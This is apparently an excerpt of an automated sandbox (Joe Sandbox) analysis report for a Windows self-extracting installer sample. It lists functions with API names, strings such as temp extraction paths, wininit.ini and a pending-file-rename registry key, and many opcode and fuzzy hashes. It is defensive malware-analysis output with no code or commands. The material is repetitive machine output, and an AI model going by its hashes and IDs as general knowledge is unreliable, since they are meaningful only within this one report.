                              • API String ID: 1865808269-1731843650
                              • Opcode ID: 00cffe6a6b6efc49b9df64414d7755e864694d57a2bcf60638ec42af2eb0385e
                              • Instruction ID: 8bc58d868f168c5220974ce1a0c64eadc43a0241c68a5cf285d17e952186001f
                              • Opcode Fuzzy Hash: 00cffe6a6b6efc49b9df64414d7755e864694d57a2bcf60638ec42af2eb0385e
                              • Instruction Fuzzy Hash: 7951A4A3A3D78186EF19AB21AC1417ABBA1FB85B90FC64934C94D07758EFBCD409C710
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CharDirectory$NextSystem$CloseEnvironmentExpandOpenQueryStringsUpperValueWindows
                              • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                              • API String ID: 229715263-2428544900
                              • Opcode ID: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
                              • Instruction ID: 4b784c93569da163efc6eb473ba56628848a5340a8c4565e75503b93979cb9a1
                              • Opcode Fuzzy Hash: 5f260c0c44f67a4d333ec0cf67bdc95a0204cc5ba749ef7936c119a4bc59c0ba
                              • Instruction Fuzzy Hash: D7517FA3A3C68187EE159B20E8442BBBBA1FB49B80F954431DA4E07798DF7DD945C710
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                              • String ID: vclib
                              • API String ID: 3785188418-3480049729
                              • Opcode ID: 3cd91ea36e2fe533022bde91c2053d597b5ed78ae3c01b02fd4e722d67f546ca
                              • Instruction ID: 5e02d5041c109fb76fd5e76a04c74fd4804697ae3ea42f280db0b23fe907492b
                              • Opcode Fuzzy Hash: 3cd91ea36e2fe533022bde91c2053d597b5ed78ae3c01b02fd4e722d67f546ca
                              • Instruction Fuzzy Hash: 553129B293C64286FE186B35EC04276E651FB8AB51FC69A30D91D06398DFFC9545C610
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                              • String ID: CheckTokenMembership$advapi32.dll
                              • API String ID: 4204503880-1888249752
                              • Opcode ID: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
                              • Instruction ID: c4e3553a36d1d08ea4aed6d016528c5a7b04c53aa3b3ec65a5d8956f065a1933
                              • Opcode Fuzzy Hash: 971b975d9a4f17aab5bf5b76504fa1808b97cf8c325f714dc856488252334909
                              • Instruction Fuzzy Hash: F1314D7362CB458ADE149F26F8401AABBA1FB89B80F864535DE4D47718DF7CD445CB00
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                              • String ID:
                              • API String ID: 975904313-0
                              • Opcode ID: 0d82e86da81dc2cef2af64c70c057c8b3ef052c49615e3a21940497ab07f1174
                              • Instruction ID: 638e48e756bec90a1ac9115188fa7b2ef47753458020897163f582a944c6d5a6
                              • Opcode Fuzzy Hash: 0d82e86da81dc2cef2af64c70c057c8b3ef052c49615e3a21940497ab07f1174
                              • Instruction Fuzzy Hash: 6B71B793A3C6C585FF595F34D8103BAEB92AF49B90F894930CB9D06389DEBDD4858321
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocEnvironmentExpandFreeLockOpenSizeStringsUpper
                              • String ID:
                              • API String ID: 2156179360-0
                              • Opcode ID: f5cf7ecaecd271d02cfedb1b12fcc4206d5a711b6b10f9e7bdb34ea6bdc4f517
                              • Instruction ID: 4dcc22bced01f01b714b8cce5e1b42433c1bf8b3aa2bc9bcb260d8c5485a3cd2
                              • Opcode Fuzzy Hash: f5cf7ecaecd271d02cfedb1b12fcc4206d5a711b6b10f9e7bdb34ea6bdc4f517
                              • Instruction Fuzzy Hash: 656195B3A3C642CAEF649B259D005BAB7A1FB04794F864931DE0953748EE79E8C1C760
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Window$CapsDeviceRect$Release
                              • String ID:
                              • API String ID: 2212493051-0
                              • Opcode ID: 69ea89c86bae83f4795465c8798f6678767ed30391b1f5c5e5c0b97e0bec92e7
                              • Instruction ID: 17b76273548811f993d8c6c1698c20b7fc6f8be5fb1e4fc99d100693b22895d2
                              • Opcode Fuzzy Hash: 69ea89c86bae83f4795465c8798f6678767ed30391b1f5c5e5c0b97e0bec92e7
                              • Instruction Fuzzy Hash: 8731A173B385018AEF149B75E8045BEBBA1F74CB99F855530CE0957B08DF78E4498B10
                              APIs
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15220
                                • Part of subcall function 00007FF776D151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15231
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15257
                                • Part of subcall function 00007FF776D151F8: LoadResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15268
                                • Part of subcall function 00007FF776D151F8: LockResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15277
                                • Part of subcall function 00007FF776D151F8: memcpy_s.MSVCRT ref: 00007FF776D15296
                                • Part of subcall function 00007FF776D151F8: FreeResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D152A5
                              • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF776D13261), ref: 00007FF776D14085
                              • LocalFree.KERNEL32 ref: 00007FF776D14108
                                • Part of subcall function 00007FF776D17958: GetLastError.KERNEL32 ref: 00007FF776D1795C
                              • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF776D13261), ref: 00007FF776D1412E
                              • LocalFree.KERNEL32(?,?,?,?,?,00007FF776D13261), ref: 00007FF776D1418F
                                • Part of subcall function 00007FF776D17D28: FindResourceA.KERNEL32(?,?,?,?,00000000,00007FF776D16D5E), ref: 00007FF776D17D52
                                • Part of subcall function 00007FF776D17D28: LoadResource.KERNEL32(?,?,?,?,00000000,00007FF776D16D5E), ref: 00007FF776D17D69
                                • Part of subcall function 00007FF776D17D28: DialogBoxIndirectParamA.USER32 ref: 00007FF776D17D9F
                                • Part of subcall function 00007FF776D17D28: FreeResource.KERNEL32(?,?,?,?,00000000,00007FF776D16D5E), ref: 00007FF776D17DB1
                              • LocalFree.KERNEL32 ref: 00007FF776D14168
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Free$Local$Find$Load$AllocDialogErrorIndirectLastLockParamSizeoflstrcmpmemcpy_s
                              • String ID: <None>$LICENSE
                              • API String ID: 2987970104-383193767
                              • Opcode ID: 5dd3bd407f754cd1b0394efa61778117bb960d3fcd90b42ad91b40d7c47cf1ff
                              • Instruction ID: d0214d4db07f21691c7e786dd7df14c2435d817b3c88539b5bd7ffa56f1b1167
                              • Opcode Fuzzy Hash: 5dd3bd407f754cd1b0394efa61778117bb960d3fcd90b42ad91b40d7c47cf1ff
                              • Instruction Fuzzy Hash: D2314FB3A3D61286FF28AB31EC14777B661EB85745F824935C90D46698EFBCE4048720
                              APIs
                              • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D1625F), ref: 00007FF776D179BB
                              • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D1625F), ref: 00007FF776D179CA
                              • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D1625F), ref: 00007FF776D17A1A
                              • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D1625F), ref: 00007FF776D17A4E
                              • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF776D1625F), ref: 00007FF776D17A67
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Free$FindLoadLock
                              • String ID: UPDFILE%lu
                              • API String ID: 3629466761-2329316264
                              • Opcode ID: 924f92d299592a6fe8a83e3fd8c1f39f55a6150d49b316aa2131220a2a41f003
                              • Instruction ID: 8406c84a2ee7d3f7691f3b3f7559e7cdb173e56b38de06ab7239223143c67fec
                              • Opcode Fuzzy Hash: 924f92d299592a6fe8a83e3fd8c1f39f55a6150d49b316aa2131220a2a41f003
                              • Instruction Fuzzy Hash: 9431A473A3C64186EF08AB35A80057AF6A1FB85B50F964635DA1E073A8CF7CE905C650
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: LocalMessage$AllocBeepFree
                              • String ID: vclib$/
                              • API String ID: 4276092941-2126187516
                              • Opcode ID: dcb505bbb6bd45acb562ccacb79d18ad80848fdde92de6b317beeb40d266570d
                              • Instruction ID: 083a3e12f8ed167fe5eb4ed44ff2cf7c5e7b0144eb30fce91898033c48c42193
                              • Opcode Fuzzy Hash: dcb505bbb6bd45acb562ccacb79d18ad80848fdde92de6b317beeb40d266570d
                              • Instruction Fuzzy Hash: 78219CF3E3C28186FF55AB75AC043BAB651AB45795F860530CE0E07388DE7CD5818310
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                              • String ID:
                              • API String ID: 3370778649-0
                              • Opcode ID: 2722992ef715b720f40bc041322e554c29a54f2f23c26d5441508fe68943f667
                              • Instruction ID: 922ce33be6462b470da84421cb06cb44ca366a5d2fc9ba96874518ab36ee885a
                              • Opcode Fuzzy Hash: 2722992ef715b720f40bc041322e554c29a54f2f23c26d5441508fe68943f667
                              • Instruction Fuzzy Hash: 3E111FB273DB4187EF186B66A80417AEA92EB4DFC1F899834DD0E47758DF7CD4418610
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: LocalMessage$AllocBeepFree
                              • String ID: vclib$/
                              • API String ID: 4276092941-2126187516
                              • Opcode ID: fb27ad1f6443415d0ca2f778c89a0248fa47774d961578e40cf1bef23ae7e3e9
                              • Instruction ID: 475fd2d1ee926f4ae1626bdaed01ef74cf161077940b349e890249841043b451
                              • Opcode Fuzzy Hash: fb27ad1f6443415d0ca2f778c89a0248fa47774d961578e40cf1bef23ae7e3e9
                              • Instruction Fuzzy Hash: 781178F3F3C28286FE69AF75AC143FAA651AF49795F864531CE0E17388DE7C95818210
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                              • String ID: wininit.ini
                              • API String ID: 3273605193-4206010578
                              • Opcode ID: 272abce5711e61987618d7fa9275a95ad876e249e85b0132ec51f4cc75ec81ca
                              • Instruction ID: 00146f0cfc56cf1d905884551a1adc77fa6cbe08ac6d6a6ab08ea8ade5cbf83e
                              • Opcode Fuzzy Hash: 272abce5711e61987618d7fa9275a95ad876e249e85b0132ec51f4cc75ec81ca
                              • Instruction Fuzzy Hash: 6311637363868187DF249B31E8502AAB6A2FBCC704FC68531DA4E47758DF7CD549CA10
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                               • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Window$Text$DesktopDialogForegroundItem
                              • String ID: vclib
                              • API String ID: 761066910-3480049729
                              APIs
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15220
                                • Part of subcall function 00007FF776D151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15231
                                • Part of subcall function 00007FF776D151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15257
                                • Part of subcall function 00007FF776D151F8: LoadResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15268
                                • Part of subcall function 00007FF776D151F8: LockResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D15277
                                • Part of subcall function 00007FF776D151F8: memcpy_s.MSVCRT ref: 00007FF776D15296
                                • Part of subcall function 00007FF776D151F8: FreeResource.KERNEL32(?,?,00000000,00007FF776D12F6B), ref: 00007FF776D152A5
                              • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF776D134BA), ref: 00007FF776D14A7D
                              • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF776D134BA), ref: 00007FF776D14B19
                              Similarity
                              • API ID: Resource$FindFreeLocal$AllocLoadLockSizeofmemcpy_s
                              • String ID: <None>$@$FINISHMSG
                              • API String ID: 1468708069-4126004490
                              Similarity
                              • API ID: Message$BeepFreeLocal
                              • String ID: vclib$/
                              • API String ID: 2161339562-2126187516
                              Similarity
                              • API ID: LibraryLoad$AttributesFile
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                              • API String ID: 438848745-476397916
                              Similarity
                              • API ID: Char$Prev$Next
                              • String ID: \
                              • API String ID: 3260447230-2967466578
                              Similarity
                              • API ID: CurrentImageInfoNonwritableSleepStartup_initterm
                              • String ID:
                              • API String ID: 303283910-0
                              Similarity
                              • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                              • String ID:
                              • API String ID: 1273765764-0
                              Similarity
                              • API ID: File$CloseCreateHandleWrite
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                              • API String ID: 1065093856-4151094324
                              Similarity
                              • API ID:
                              • String ID: *MEMCAB
                              • API String ID: 0-3211172518
                              Strings
                              • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00007FF776D1232B
                              Similarity
                              • API ID: CloseInfoOpenQuery
                              • String ID: System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                              • API String ID: 2142960691-1430103811
                              Similarity
                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                              • String ID:
                              • API String ID: 140117192-0
                              Similarity
                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                              • String ID:
                              • API String ID: 140117192-0
                              Similarity
                              • API ID: Resource$DialogFindFreeIndirectLoadParam
                              • String ID:
                              • API String ID: 1214682469-0
                              Similarity
                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                              • String ID:
                              • API String ID: 140117192-0
                              Similarity
                              • API ID: Message$Peek$DispatchMultipleObjectsWait
                              • String ID:
                              • API String ID: 2776232527-0